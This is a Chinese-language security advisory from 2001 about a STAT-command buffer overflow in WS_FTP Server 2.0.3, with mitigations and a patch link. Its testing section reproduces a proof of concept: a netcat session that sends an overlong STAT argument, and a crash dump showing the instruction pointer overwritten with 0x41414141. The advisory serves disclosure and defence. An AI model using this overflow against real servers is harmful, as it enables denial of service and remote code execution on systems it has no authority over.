发布日期：2001-11-05
更新日期：2001-11-07

受影响系统：

WS_FTP Server v2.0.3

描述：

---

WS_FTP Server 是基于Windows平台的FTP服务器软件，该软件的2.0.3 版本存在一个缓
冲区溢出漏洞，可能允许远程攻击者执行任意代码。

这是由于解析“STAT”命令的代码没有验证用户输入的参数长度，如果攻击者输入一个超长的参数给'STAT'命令，就会发生缓冲区溢出。

<*来源：Andreas Junestam (andreas@defcom.com)
        Janne Sarendal (janne@defcom.com)
  链接：http://archives.neohapsis.com/archives/bugtraq/2001-11/0019.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Andreas Junestam (andreas@defcom.com)提供了如下测试代码：

C:\tools\web>nc localhost 21
  220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  220-Wed Aug 08 19:57:40 2001
  220-30 days remaining on evaluation.
  220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAA

  0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
  SetFolder = C:\program\iFtpSvc\helig
  SetFolder = C:\program\iFtpSvc\helig\public
  SetFolder = C:/program/iFtpSvc/helig
  0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
  (A1)
  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
  esi=0067c280 edi=00130178
  eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
  41414141 ?? ???

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 限制未授权的用户访问该WS_FTP Server
* 关闭匿名FTP登录服务

厂商补丁：

WS_FTP Server v2.0.4已经解决了这个安全问题，请到厂商的主页下载：
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html

浏览次数：4896
严重程度：0（网友投票）